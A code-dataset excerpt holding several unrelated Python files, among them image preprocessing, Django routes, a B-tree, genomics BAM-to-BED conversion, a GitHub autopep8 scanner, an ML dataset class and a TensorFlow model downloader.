================================================================\n# Preprocess the style image\n# ================================================================\ndef PreprocessStyleImage(path, shape):\n img = misc.imread(path)\n resized_img = misc.imresize(img, (shape[2], shape[3]))\n sample=np.transpose(resized_img,[2,0,1])\n sample=np.array(sample,dtype=np.float)\n\n sample[0, :] -= 123.68\n sample[1, :] -= 116.779\n sample[2, :] -= 103.939\n return np.resize(sample, (1, 3, sample.shape[1], sample.shape[2]))\n\n# ================================================================\n# Save the converted image\n# ================================================================\ndef SaveImage(img, filename):\n logging.info('save output to %s', filename)\n img = np.reshape(img, (3, img.shape[2], img.shape[3]))\n img[0, :] += 123.68\n img[1, :] += 116.779\n img[2, :] += 103.939\n img=np.transpose(img,[1,2,0])\n img = np.clip(img, 0, 255)\n img=img.astype('uint8')\n\n misc.imsave(filename, img)\n","sub_path":"Computer_vision/neurall_style/image_process.py","file_name":"image_process.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"282949343","text":"def render(w,h):\n for y in range(h):\n for x in range(w):\n if x==0 or x==w-1 or y==0 or y==h-1:\n print(\"#\",end=\"\")\n else:\n print(\" \",end=\"\")\n print()\n\nrender(10,10)\n\n","sub_path":"ppf-ex09/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"263076062","text":"from django.conf.urls import url\nimport views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n\n #API\n url(r'^api/login$', views.login, name='login'),\n url(r'^api/logout$', views.logout, name='logout'),\n url(r'^api/events_list/?$', views.get_events_list, name='events_list'),\n url(r'^api/event/?$', views.get_event_details, name='event_details'),\n url(r'^api/search_event/?$', views.search_event, name='search_event'),\n url(r'^api/join_event$', views.join_event, name='join_event'),\n url(r'^api/reaction$', views.reaction, name='reaction'),\n url(r'^api/comment$', views.comment, name='comment'),\n url(r'^api/get_participant/?$', views.get_participant, name='get_participant'),\n url(r'^api/get_reaction/?$', views.get_reaction, name='get_reaction'),\n url(r'^api/get_comment/?$', views.get_comment, name='get_comment'),\n\n #API admin\n url(r'^api/admin/login$', views.admin_login, name='admin_login'),\n url(r'^api/admin/upload$', views.admin_upload, name='admin_upload')\n]\n","sub_path":"social_sharing/social_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"542388470","text":"# coding:utf-8\nfrom distutils.core import setup\n\n# insert the statement \"import py2exe\" before calling setup\nimport py2exe\n\nincludes = [\"encodings\", \"encodings.*\"]\noptions = {\n \"py2exe\":\n {\n \"includes\": includes\n }}\n\nsetup(\n # 1. build a console .exe program\n console=[\"helloworld.py\"]\n\n # build a GUI program instead\n # windows=[\"helloworld.py\"]\n)\n'''\n1. Building a console .exe program\npy2exe can build several exe files in one run; you pass the list of script files to the console or windows keyword argument. This is useful if you have several related scripts.\n\n2. Building a graphical user interface\nIf you want to build a program with a graphical user interface, replace console=[\"myscript.py\"] with windows=[\"myscript.py\"].\nNote the usage of windows: it can replace console, and you will definitely need it when integrating wxPython.
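\n\nA minimal build sketch (the GUI script name here is hypothetical, added for illustration):\n setup(windows=[\"gui_app.py\"], options={\"py2exe\": {\"includes\": includes}})\nthen build with: python DemoSetup.py py2exe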
\n'''\n","sub_path":"PyModules/py2exe_/DemoSetup.py","file_name":"DemoSetup.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"227588169","text":"from CharacterGenerator import font_source\nfrom CharacterSource import NumericCharacterSource, AlphaNumericCharacterSource\nfrom PIL import Image, ImageDraw, ImageFont, ImageFilter, ImageTransform, ImageChops\nfrom Utils import mkdir\nimport random\nimport numpy as np\nimport uuid\nimport argparse\nimport sys, errno, os\nimport pickle\nimport Drawing\nimport Utils\n\nnum_char_columns = 2\nnum_char_rows = 32\ndebug = True\nchar_source = NumericCharacterSource()\n\ndef create_char_sequence(image_width = 128, image_height = 32, options={}):\n canvas_width = image_width * 2\n canvas_height = image_height * 2\n font = font_source.random_font(options)\n min_color_delta = options.get('min_color_delta', 32)\n text_color = random.randint(0,255)\n background_color = Drawing.random_background_color(text_color, min_color_delta=min_color_delta)\n text = char_source.random_char()\n\n image = Drawing.create_char_background(canvas_width, canvas_height, text_color, background_color, min_color_delta, options=options)\n char_image = Image.new('RGBA', (canvas_width, canvas_height), (0,0,0,0))\n\n text = \"\"\n\n for i in range(0,random.randint(1,10)):\n text += char_source.random_char()\n\n (w,h) = font.calc_text_size(text)\n x = 0.5 * (canvas_width - w)\n y = 0.5 * (canvas_height - h)\n margin = random.random() * 16\n x += (random.random() - 0.5) * 0.5 * margin\n y += (random.random() - 0.5) * (image_height - h)\n\n draw = ImageDraw.Draw(char_image)\n Drawing.draw_text_with_random_outline(draw, x, y, text, font, text_color)\n\n if random.random() > 0.5:\n image = Drawing.add_shadow(char_image, image, x, y, font, text, text_color)\n\n char_image = Image.alpha_composite(image, char_image)\n char_image = Drawing.random_rotate(char_image, options)\n# char_image = perspective_transform(char_image)\n char_image = Drawing.crop(char_image, w + margin, rescale=False)\n char_image = Drawing.random_blur(char_image, options)\n char_image = Drawing.add_noise(char_image, options)\n return char_image, text\n\n\ndef create_segmentation_examples(data_dir, n):\n image_width = 256\n image_height = 32\n options={'min_color_delta':16.0, 'min_blur':0.5, 'max_blur':1.5, 'max_rotation':2.0, 'min_noise':4, 'max_noise':4, 'add_background_lines':False}\n options['full_alphabet'] = False\n\n full_alphabet = options.get('full_alphabet', False)\n if full_alphabet:\n char_source = AlphaNumericCharacterSource()\n\n labels = {}\n mkdir(data_dir)\n for i in range(n):\n Utils.progress_bar(i+1, n)\n id = str(uuid.uuid4())\n char_image, label = create_char_sequence(image_width, image_height, options)\n labels[id] = label\n char_image.save(data_dir + \"/\" + id + \".png\")\n file = open(data_dir + '/' + 'labels.pickle', 'wb')\n print (\"Writing labels.pickle ...\")\n pickle.dump(labels, file, -1)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', action=\"store\", dest=\"n\", type=int, default=1024)\n parser.add_argument('--directory', action='store', dest='data_dir', default='data')\n parser.add_argument(\"--save\", help=\"save image as png along with a pickle of the labels\", action=\"store_true\")\n args = parser.parse_args()\n create_segmentation_examples(args.data_dir, 
args.n)\n","sub_path":"CharacterSequenceGenerator.py","file_name":"CharacterSequenceGenerator.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"77485212","text":"# coding:utf-8\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n# class Article\nclass Article:\n\n def __init__(self, id, url, title, author, time, clstext, modtext, annotext):\n self.id = id\n self.url = url\n self.title = title\n self.author = author\n self.time = time\n self.clstext = clstext\n self.modtext = modtext\n self.annotext = annotext\n\n def set_clsparas(self, clsparas):\n self.clsparas = clsparas\n\n def set_modparas(self, modparas):\n self.modparas = modparas\n\n \"\"\"\n set annotations of the article\n annotation: {paragraph_position:\n {sentence_position:\n [[token_pos,token,note],...]\n }}\n \"\"\"\n def set_annotations(self, annotations):\n self.annotations = annotations\n\n# class Paragraph\nclass Paragraph:\n\n def __init__(self, text, sentences):\n self.text = text\n self.sentences = sentences\n\n def set_sentences(self, sentences):\n self.sentences = sentences\n\n# class Annotation\nclass Annotation:\n token = None\n note = None\n p_pos = None # at which paragraph; specifically, \"title\" for the title and \"author\" for the author line.\n s_pos = None # at which sentence.\n t_pos = None # at which token.\n\n def __init__(self, token, note, p_pos, s_pos, t_pos):\n self.token = token\n self.note = note\n self.p_pos = p_pos\n self.s_pos = s_pos\n self.t_pos = t_pos\n","sub_path":"align/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"183737937","text":"class Node:\n def __init__(self):\n self.values = []\n self.next = []\n self.parent = None\n\n\nclass BTree:\n def __init__(self, t):\n self.t = t\n self.root = None\n\n def devastateNode(self, node: Node):\n mid = (3*self.t - 2)//2 - 1\n if node == self.root:\n left = Node()\n right = Node()\n left.values = node.values[:mid]\n left.next = node.next[:mid+1]\n left.parent = node\n for i in left.next:\n i.parent = left\n right.values = node.values[mid+1:]\n right.next = node.next[mid+1:]\n right.parent = node\n for i in right.next:\n i.parent = right\n node.values = [node.values[mid]]\n node.next = [left, right]\n else:\n right = Node()\n right.values = node.values[mid+1:]\n right.next = node.next[mid+1:]\n right.parent = node.parent\n val = node.values[mid]\n node.values = node.values[:mid]\n node.next = node.next[:mid+1]\n for i in range(len(node.parent.values) + 1):\n if i == len(node.parent.values) or val < node.parent.values[i]:\n node.parent.values.insert(i, val)\n node.parent.next.insert(i+1, right)\n break\n\n def insert(self, val, node, allowdevastation):\n if allowdevastation and len(node.values) == 2 * self.t - 1:\n self.devastateNode(node)\n if node.parent is not None:\n self.insert(val, node.parent, False)\n else:\n self.insert(val, node, False)\n elif len(node.next) == 0:\n for i in range(len(node.values) + 1):\n if i == len(node.values) or val < node.values[i]:\n node.values.insert(i, val)\n break\n else:\n for i in range(len(node.values) + 1):\n if i == len(node.values) or val < node.values[i]:\n self.insert(val, node.next[i], True)\n break\n\n def printChildrenFirst(self):\n if self.root is None:\n print(\"Drzewo puste\")\n return\n children = [self.root]\n while children:\n newchildren = []\n for i in children:\n print(\"|\", 
end=\" \")\n for j in i.values:\n print(j, end=\" \")\n for j in i.next:\n newchildren.append(j)\n print(\"|\")\n children = newchildren\n\n\ndef printDepthFirst(tree: Node):\n if tree is None:\n print(\"Drzewo puste\")\n return\n printDepthFirst(tree.left)\n print(tree.value)\n printDepthFirst(tree.right)\n\n\ndef insert(tree: Node, val):\n if tree is None:\n tree = Node()\n tree.value = val\n elif val < tree.value:\n tree.left = insert(tree.left, val)\n elif val > tree.value:\n tree.right = insert(tree.right, val)\n return tree\n\n\ndef insert2(tree: Node, val):\n if tree.value is None:\n tree.value = val\n elif val < tree.value:\n tree.left = tree.left or Node()\n insert(tree.left, val)\n elif val > tree.value:\n tree.right = tree.right or Node()\n insert(tree.right, val)\n\n\ndef delete(tree: Node, val, parent):\n res = tree\n while tree is not None and tree.value != val:\n if val < tree.value:\n parent = tree\n tree = tree.left\n elif val > tree.value:\n parent = tree\n tree = tree.right\n\n if tree is not None:\n if tree.left is None and tree.right is None:\n if parent is None:\n return None\n if parent.left == tree:\n parent.left = None\n else:\n parent.right = None\n elif tree.left is not None and tree.right is not None:\n child = tree.right\n childparent = tree\n while child.left is not None:\n childparent = child\n child = child.left\n tree.value = child.value\n delete(child, child.value, childparent)\n else:\n if parent is None:\n return tree.left or tree.right\n if tree == parent.left:\n parent.left = tree.left or tree.right\n else:\n parent.right = tree.left or tree.right\n\n return res\n\n\ntree = BTree(2)\ntree.root = Node()\ntree.root.values = [2, 10]\nleft = Node()\nleft.values = [0, 1]\nleft.parent = tree.root\nmid = Node()\nmid.values = [5, 8]\nmid.parent = tree.root\nright = Node()\nright.values = [15, 16, 17]\nright.parent = tree.root\ntree.root.next = [left, mid, right]\n\ntree.printChildrenFirst()\ntree.insert(16.5, tree.root, True)\ntree.printChildrenFirst()\ntree.insert(17.5, tree.root, True)\ntree.printChildrenFirst()\ntree.insert(18.5, tree.root, True)\ntree.printChildrenFirst()\ntree.insert(9, tree.root, True)\ntree.printChildrenFirst()\ntree.insert(9.5, tree.root, True)\ntree.printChildrenFirst()\n\n\n","sub_path":"btree.py","file_name":"btree.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"584189823","text":"#!/usr/bin/env python\n\n\"\"\"\nPre-processing including following steps:\n1) sorting by read names\n2) remove duplicates\n3) convert to bed file\nCreated by Rongxin Fang\n\"\"\"\nimport sys\nimport gzip\nimport pysam\nimport os\nimport collections \n\ndef is_sorted_queryname(header):\n \"\"\"\n Check if bam fiel is sorted by read name.\n \"\"\"\n if(\"HD\" in header):\n if(\"SO\" in header[\"HD\"]):\n if(header[\"HD\"][\"SO\"] == \"queryname\"):\n return True\n return False\n \ndef main():\n\n barcode_uniq = collections.defaultdict(lambda : 0)\n barcode_total = collections.defaultdict(lambda : 0)\n\n from argparse import ArgumentParser\n # parameters\n \n parser = ArgumentParser(description='snATAC-seq preprocessing')\n parser.add_argument('-i', '--input', help='input bam file', required=True)\n parser.add_argument('-o', '--output', help='output bed/bed.gz file', required=True)\n parser.add_argument('-m', '--mapq', help='min mappability score [30]', required=True)\n parser.add_argument('-t', '--threads', help='number of threads [3]', required=True)\n 
parser.add_argument('-f', '--flen', help='maximum fragment length [2000]', required=True)\n parser.add_argument('-e', '--elen', help='extend reads by -e base pairs in each direction [75]', required=True)\n \n options = parser.parse_args()\n\n num_threads = 1\n min_mapq = 30\n max_flen = 2000\n exlen = 75 \n # input parsing\n input_bam = options.input\n output_bed = options.output\n num_threads = int(options.threads)\n min_mapq = int(options.mapq)\n max_flen = int(options.flen)\n exlen = int(options.elen)\n \n \n if output_bed.endswith(\".gz\"):\n fout = gzip.open(output_bed, \"wt\") # text mode: we write str, not bytes\n else:\n fout = open(output_bed, \"w\")\n \n # start reading the bam\n samfile = pysam.AlignmentFile(input_bam, \"rb\")\n\n\n genome_size = dict([[item[\"SN\"], int(item[\"LN\"])] for item in samfile.header[\"SQ\"]])\n\n pre_barcode = \"\"\n cur_list = []\n \n for read in samfile:\n cur_barcode = read.qname.split(\":\")[0]\n rname = str(read.reference_name)\n rstart = str(max(1, read.reference_end -5 - exlen if read.is_reverse else read.reference_start + 4 - exlen))\n rend = str(min(genome_size[rname], read.reference_end - 5 + exlen if read.is_reverse else read.reference_start +4 + exlen))\n #rstart = str(max(1, read.reference_start - exlen if read.is_reverse else read.reference_start + 4 - exlen))\n #rend = str(min(genome_size[rname], read.reference_end - 5 + exlen if read.is_reverse else read.reference_end + exlen))\n if(pre_barcode == cur_barcode):\n cur_list.append((rname, rstart, rend, cur_barcode))\n \n barcode_total[cur_barcode] += 1\n else:\n for item in set(cur_list):\n barcode_uniq[item[3]] += 1\n fout.write(\"\\t\".join(list(item))+\"\\n\")\n pre_barcode = cur_barcode\n cur_list = [(rname, rstart, rend, cur_barcode)]\n barcode_total[cur_barcode] += 1\n \n # don't forget about the last barcode\n for item in set(cur_list):\n barcode_uniq[item[3]] += 1\n fout.write(\"\\t\".join(list(item))+\"\\n\")\n\n samfile.close()\n \n # write down the qc file\n with open(output_bed+\".qc\", \"w\") as fout:\n for barcode in barcode_total:\n fout.write(\"\\t\".join([barcode, str(barcode_uniq[barcode]), str(1 - float(barcode_uniq[barcode])/barcode_total[barcode])]) + \"\\n\") \n \nif __name__ == '__main__':\n main()\n","sub_path":"scAR_process/snap_prebed.py","file_name":"snap_prebed.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"428095025","text":"from github import Github\nimport autopep8\nfrom datetime import datetime\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\nnumber = 0\n\ndef main():\n token = os.getenv('GIT_HUB_TOKEN')\n g = Github(token)\n username = os.getenv('GIT_HUB_USERNAME')\n\n for repo in g.search_repositories(\"language:Python pugs pushed:>2020-08-28\"):\n now = datetime.now()\n\n current_time = now.strftime(\"%H:%M:%S\")\n print(\"Current Time =\", current_time)\n print(g.rate_limiting)\n print(g.rate_limiting_resettime)\n analyze_repo(repo)\n\ndef analyze_repo(repo):\n global number\n for file_text in get_files_text(repo, \".py\"):\n origin = file_text.decoded_content.decode()\n new = autopep8.fix_code(origin)\n if new != origin:\n print(\"COMMIT fix to file\", file_text.path)\n\ndef commit_change(repo, file, new_data, commit):\n print(repo.url)\n print(\"file.path\", file.path)\n print(\"file.sha\", file.sha)\n repo.update_file(\"/\" + file.path, commit, new_data, file.sha)\n\n\ndef get_files_text(repo, end):\n end_len = len(end)\n contents = repo.get_contents(\"\")\n while 
contents:\n file_content = contents.pop(0)\n if file_content.type == \"dir\":\n contents.extend(repo.get_contents(file_content.path))\n else:\n if len(file_content.path) > end_len:\n file_end = file_content.path[len(file_content.path) - end_len:]\n if file_end == end:\n yield file_content\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"46700801","text":"\nimport numpy as np\nimport random\n\nfrom .datasets_base import DatasetsBase, InOut, DATASET_OPS\nfrom ..core.registry import DATASET_AUGMENT, DATASET_CREATE, DATASET_INOUT, DATASET_LOAD, DATASET_PREPROCESS, DATASET_SAVE, DATASET_SPLIT\n\n\nclass Datasets(DatasetsBase):\n \"\"\"\n Datasets class containing training, test and validation datasets\n self.dataset : Original dataset\n self.dataset_test : Test dataset (split from self.dataset)\n self.dataset_test_xy : Test dataset, inputs and outputs\n self.dataset_train : Train dataset (split from self.dataset)\n self.dataset_train_xy : Train dataset inputs and outputs\n self.dataset_validate : Validation dataset (split from self.dataset)\n self.dataset_validate_xy : Validation dataset inputs and outputs\n \"\"\"\n def __init__(self, config, set_config=True):\n super().__init__(config, set_config)\n\n def augment(self):\n ret = self.invoke_augment()\n if ret:\n return ret\n # We provide a default implementation\n return self.default_augment()\n\n def __call__(self):\n \"\"\"\n Load (or create) dataset, then augment, preprocess and split\n Save at each step for faster processing / consistency\n \"\"\"\n if not self.enable:\n self._debug(f\"Dataset disabled, skipping (enable='{self.enable}')\")\n return True\n self._debug(\"Start\")\n self.should_save = False\n if self.load():\n self._debug(f\"Dataset loaded. {self.memory()}\")\n elif self.create():\n self._debug(f\"Dataset created. {self.memory()}\")\n self.should_save = True\n else:\n self._debug(\"Could not load or create dataset\")\n return False\n # Perform operations\n for op in self.operations:\n if self.do(op):\n self.should_save = True\n # Get inputs / outputs\n self.in_outs()\n # Save\n if self.should_save:\n self._debug(f\"Should save = {self.should_save}, saving dataset\")\n self.save()\n self._debug(f\"End. {self.memory()}\")\n return True\n\n def _config_sanity_check(self):\n \"\"\"\n Check parameters from config.\n Return True on success, False if there are errors\n \"\"\"\n if self.dataset_path is None:\n self._fatal_error(f\"Missing 'dataset_path' parameter in config file '{self.config.config_file}', section {CONFIG_DATASET}\")\n if self.dataset_name is None:\n self._fatal_error(f\"Missing 'dataset_name' parameter in config file '{self.config.config_file}', section {CONFIG_DATASET}\")\n return True\n\n def create(self):\n return self.invoke_create()\n\n def default_augment(self):\n return False\n\n def default_in_out(self, ds, name):\n \"\"\" Default method for getting inputs / outputs \"\"\"\n if self.is_use_all_inputs:\n # Use all inputs, no output (e.g. unsupervised learning)\n return InOut(ds, None)\n self._fatal_error(\"Default 'dataset_inout' method not defined\")\n return InOut(None, None)\n\n def default_load(self):\n \"\"\" Load dataset from pickle file. 
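Honors 'do_not_load_pickle' (returns False without loading). 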
Return new dataset \"\"\"\n if self.do_not_load_pickle:\n return False\n file_name = self.get_file()\n self._debug(f\"Load dataset from file '{file_name}'\")\n ds = self._load_pickle(file_name, 'Load dataset')\n if ds:\n # Copy data from loaded dataset\n self.dataset = ds.dataset\n self.dataset_test = ds.dataset_test\n self.dataset_train = ds.dataset_train\n self.dataset_validate = ds.dataset_validate\n self.operations = ds.operations\n self.operations_done = ds.operations_done\n self._debug(f\"Load dataset done, file '{file_name}'\")\n return ds is not None\n\n def default_preprocess(self):\n \" Default implementation for '@dataset_preprocess' \"\n self._debug(f\"Default dataset preprocess not defined, skipping\")\n return False\n\n def default_save(self):\n \"\"\" Default implementation of '@dataset_save' \"\"\"\n return self._save_pickle(self.get_file(), 'Save dataset', self)\n\n def default_split(self):\n \"\"\"\n Default implementation for '@dataset_split'\n Assumptions:\n 1) self.dataset object is iterable\n 2) Parameter 'split_test' and 'split_validate' are defined such that\n 2.a) split_test >= 0\n 2.b) split_validate >= 0\n 2.c) split_test + split_validate < 1\n It returns three list of 'samples': train, validate, test\n \"\"\"\n # Is datasets iterable?\n self._debug(f\"Using default split method\")\n # Are split parameters defined?\n kwargs = self.config.get_parameters_functions(DATASET_SPLIT)\n for key in ['split_test', 'split_validate']:\n if key not in kwargs:\n self._debug(f\"Cannot run default _split: Parameter '{key}' not in defined for section '{DATASET_SPLIT}' in YAML file\")\n return False\n split_test, split_validate = kwargs['split_test'], kwargs['split_validate']\n # Split dataset into three lists\n idx_train, idx_validate, idx_test = list(), list(), list()\n len_tot = len(self.dataset)\n for idx in range(len_tot):\n r = random.random()\n if r <= split_validate:\n idx_validate.append(idx)\n elif r <= split_test + split_validate:\n idx_test.append(idx)\n else:\n idx_train.append(idx)\n self._info(f\"Splitting dataset: train={len(idx_train) / len_tot}, validate={len(idx_validate) / len_tot}, test={len(idx_test) / len_tot}. {self.memory()}\")\n idx_train, idx_validate, idx_test = np.array(idx_train), np.array(idx_validate), np.array(idx_test)\n return self.split_idx(idx_train, idx_validate, idx_test)\n\n def do(self, op):\n \"\"\"\n Perform an abstract operation on a dataset\n Return True if the dataset operation has been applied (i.e. the dataset changed)\n \"\"\"\n self._debug(f\"Dataset operation '{op}': Start\")\n ok = False\n if op in self.operations_done:\n self._debug(f\"Operation '{op}' has been done. Skipping\")\n return False\n if op == DATASET_AUGMENT:\n ok = self.augment()\n elif op == DATASET_CREATE:\n ok = self.create()\n elif op == DATASET_PREPROCESS:\n ok = self.preprocess()\n elif op == DATASET_SPLIT:\n ok = self.split()\n elif op == DATASET_INOUT:\n ok = self.in_outs()\n else:\n raise ValueError(f\"Unknown dataset operation '{op}'\")\n if ok:\n self.operations_done.add(op)\n self._debug(f\"Dataset operation '{op}': End, ok={ok}. 
{self.memory()}\")\n return ok\n\n def __getitem__(self, key):\n return self.dataset[key]\n\n def _in_out(self, ds, name):\n \"\"\"\n Split inputs and outputs from dataset 'ds'\n Returns an InOut named tuple\n \"\"\"\n if ds is None:\n return InOut(None, None)\n self._debug(f\"Get inputs & outputs from dataset '{name}'\")\n (invoked, ret) = self.invoke_in_out(ds, name)\n if invoked:\n self._debug(f\"In/Out {name} invoked: {self.memory()}\")\n return ret\n # We provide a default implementation for 'in_out'\n if self.is_use_default_in_out:\n return self.default_in_out(ds, name)\n self._fatal_error(\"Unable to get inputs & outputs from dataset. No function registered\")\n return InOut(None, None)\n\n def in_outs(self, all=True):\n \"\"\" Get inputs & outputs for all datasets \"\"\"\n if all:\n self.dataset_xy = self._in_out(self.dataset, 'all')\n self.dataset_test_xy = self._in_out(self.dataset_test, 'test')\n self.dataset_train_xy = self._in_out(self.dataset_train, 'train')\n self.dataset_validate_xy = self._in_out(self.dataset_validate, 'validate')\n self._debug(f\"In/Out finished: {self.memory()}\")\n return True\n\n def invoke_augment(self):\n \" Invoke user defined function for '@dataset_augment' \"\n args = [self.dataset]\n (invoked, ret) = self.config.invoke(DATASET_AUGMENT, 'Augment', args)\n if invoked:\n self.dataset = ret\n return invoked\n\n def invoke_create(self):\n \" Invoke user defined function for '@dataset_create' \"\n (invoked, ret) = self.config.invoke(DATASET_CREATE, 'Create dataset')\n if invoked:\n self.dataset = ret\n return invoked\n\n def invoke_in_out(self, ds, name):\n \" Invoke user defined function for '@dataset_inout' \"\n args = [ds]\n (invoked, ret) = self.config.invoke(DATASET_INOUT, f\"InOut {name}\", args)\n if invoked:\n if ret is None or len(ret) != 2:\n self._fatal_error(f\"User defined function '{DATASET_INOUT}' should return a tuple, but it returned '{ret}'\")\n x, y = ret\n return True, InOut(x, y)\n return False, InOut(None, None)\n\n def invoke_load(self):\n \" Invoke user defined function for '@dataset_load' \"\n (invoked, ret) = self.config.invoke(DATASET_LOAD, 'Load dataset')\n if invoked:\n self.dataset = ret\n return invoked\n\n def invoke_preprocess(self):\n \" Invoke user defined function for '@dataset_preprocess' \"\n args = [self.dataset]\n (invoked, ret) = self.config.invoke(DATASET_PREPROCESS, 'Preprocess', args)\n if invoked:\n self.dataset = ret\n return invoked\n\n def invoke_save(self):\n \" Invoke user defined function for '@dataset_save' \"\n args = [self.dataset, self.dataset_train, self.dataset_test, self.dataset_validate]\n (invoked, ret) = self.config.invoke(DATASET_SAVE, 'Save dataset', args)\n return invoked\n\n def invoke_split(self):\n \" Invoke user defined function for '@dataset_split' \"\n args = [self.dataset]\n (invoked, ret) = self.config.invoke(DATASET_SPLIT, 'Split dataset', args)\n if invoked:\n # The returned dataset is a tuple, unpack it\n self.dataset_train, self.dataset_validate, self.dataset_test = ret\n return invoked\n\n def __len__(self):\n return 0 if self.dataset is None else len(self.dataset)\n\n def load(self):\n \"\"\" Try to load dataset, first from pickle otherwise from user defined function \"\"\"\n if self.default_load():\n self.should_save = False\n return True\n if self.invoke_load():\n self.should_save = True\n return True\n return False\n\n def preprocess(self):\n ret = self.invoke_preprocess()\n if ret:\n return ret\n # We provide a default implementation\n if 
self.is_use_default_preprocess:\n return self.default_preprocess()\n return False\n\n def reset(self, soft=False):\n \"\"\" Reset fields \"\"\"\n self.dataset = None\n self.dataset_test = None\n self.dataset_train = None\n self.dataset_validate = None\n self.operations_done = set()\n if not soft:\n self.dataset_xy = InOut(None, None)\n self.dataset_test_xy = InOut(None, None)\n self.dataset_train_xy = InOut(None, None)\n self.dataset_validate_xy = InOut(None, None)\n self.operations = DATASET_OPS\n self.outputs = list()\n self.should_save = False\n\n def save(self):\n \"\"\" Try to save dataset, first use user defined function otherwise save to pickle otherwise\"\"\"\n if self.do_not_save:\n return False\n return True if self.invoke_save() else self.default_save()\n\n def split(self):\n \" Split dataset into train, test, validate \"\n ret = self.invoke_split()\n if ret:\n self._debug(f\"Split invoked: {self.memory()}\")\n return ret\n # We provide a default implementation for dataset_split\n if self.is_use_default_split:\n ret = self.default_split()\n self._debug(f\"Split default result {ret}: {self.memory()}\")\n return ret\n return False\n\n def split_idx(self, idx_train, idx_validate, idx_test=None):\n \"\"\" Split dataset using an index list / array \"\"\"\n len_test = len(idx_test) if idx_test is not None else 0\n len_validate = len(idx_validate) if idx_validate is not None else 0\n self._debug(f\"Split dataset by idx. Lengths, train: {len(idx_train)}, validate: {len(idx_validate)}, test:{len_test}\")\n self.dataset_train = self[idx_train]\n if len_validate > 0:\n self.dataset_validate = self[idx_validate]\n if len_test > 0:\n self.dataset_test = self[idx_test]\n self.in_outs()\n return True\n","sub_path":"src/logml/datasets/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":13043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"68763124","text":"import os\nimport shutil\nimport tarfile\nimport urllib.request as urllib\n\nfrom settings import model_dir\n\ndef download_od_model():\n \"\"\"\n Downloads a mobile model from the Tensorflow model zoo and prepares it for usage in\n Tensorflow Serving.\n \"\"\"\n model_name = 'ssd_mobilenet_v2_coco_2018_03_29'\n fname = '{}.tar.gz'.format(model_name)\n url = \"http://download.tensorflow.org/models/object_detection/{}\".format(fname)\n mobile_dir = os.path.join(model_dir, model_name)\n\n if not os.path.exists(mobile_dir):\n os.mkdir(mobile_dir)\n file = urllib.URLopener()\n file.retrieve(url, fname)\n\n tar = tarfile.open(fname, \"r:gz\")\n tar.extractall('models')\n tar.close()\n os.remove(fname)\n\n checkpoint_dir = os.path.join(mobile_dir, '1')\n os.rename(os.path.join(mobile_dir, 'saved_model'), checkpoint_dir)\n shutil.move(os.path.join(mobile_dir, 'checkpoint'),\n os.path.join(checkpoint_dir, 'checkpoint'))\n shutil.move(os.path.join(mobile_dir, 'frozen_inference_graph.pb'),\n os.path.join(checkpoint_dir, 'frozen_inference_graph.pb'))\n shutil.move(os.path.join(mobile_dir, 'model.ckpt.data-00000-of-00001'),\n os.path.join(checkpoint_dir, 'model.ckpt.data-00000-of-00001'))\n shutil.move(os.path.join(mobile_dir, 'model.ckpt.index'),\n os.path.join(checkpoint_dir, 'model.ckpt.index'))\n shutil.move(os.path.join(mobile_dir, 'model.ckpt.meta'),\n os.path.join(checkpoint_dir, 'model.ckpt.meta'))\n shutil.move(os.path.join(mobile_dir, 'pipeline.config'),\n os.path.join(checkpoint_dir, 'pipeline.config'))\n\nif __name__ == '__main__':\n 
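    # Entry point: executing this module directly downloads the
    # ssd_mobilenet_v2 archive and rearranges it into the numbered
    # version directory ("1/") that TensorFlow Serving expects.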
download_od_model()\n","sub_path":"object_detector/download_od_model.py","file_name":"download_od_model.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"380389817","text":"\n# simpypatch1.py\n# \n# Instrument the step() method a little more to get useful information\n# out of errors in the events. The \"raise exc\" line fails 100% of the\n# time without revealing anything about the problem; all we get is \n# \"not enough arguments for format string.\"\n\n\ndef step(self):\n \"\"\"Process the next event.\n\n Raise an :exc:`EmptySchedule` if no further events are available.\n\n \"\"\"\n print(\"\\nENTERING step:\")\n try:\n self._now, _, _, event = heappop(self._queue)\n print(\"now:\", self._now, \"event:\", event)\n except IndexError:\n raise EmptySchedule()\n\n # Process callbacks of the event. Set the events callbacks to None\n # immediately to prevent concurrent modifications.\n callbacks, event.callbacks = event.callbacks, None\n print(\"callbacks:\", callbacks)\n for callback in callbacks:\n callback(event)\n\n print(\"event.ok\", event.ok)\n if not event.ok and not hasattr(event, 'defused'):\n # The event has failed and has not been defused. Crash the\n # environment.\n # Create a copy of the failure exception with a new traceback.\n exc = type(event._value)(*event._value.args)\n exc.__cause__ = event._value\n raise exc\n\nfrom simpy import Environment\nfrom heapq import heappush, 